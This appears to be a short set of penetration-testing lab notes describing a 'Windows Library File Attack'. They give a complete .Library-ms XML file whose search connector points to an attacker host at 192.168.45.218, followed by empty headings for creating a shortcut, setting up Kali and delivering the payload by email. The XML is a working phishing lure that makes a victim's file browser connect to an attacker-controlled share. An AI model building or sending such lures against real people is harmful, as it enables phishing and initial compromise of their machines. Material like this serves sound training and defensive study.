Windows Library File Attack
Step 1 : Create the Windows Library File (on Windows)
type nul > config.Library-ms<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-345826</name>
<ownerSID>S-1-5-21</ownerSID>
<version>1</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.45.218</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>Step 2 : Create the Shortcut File (on Windows)

Step 3 : Set Up Kali (Attack Machine)
Step 4 : Deliver the Payload via Email
Attack Flow Summary
Port
Service
Purpose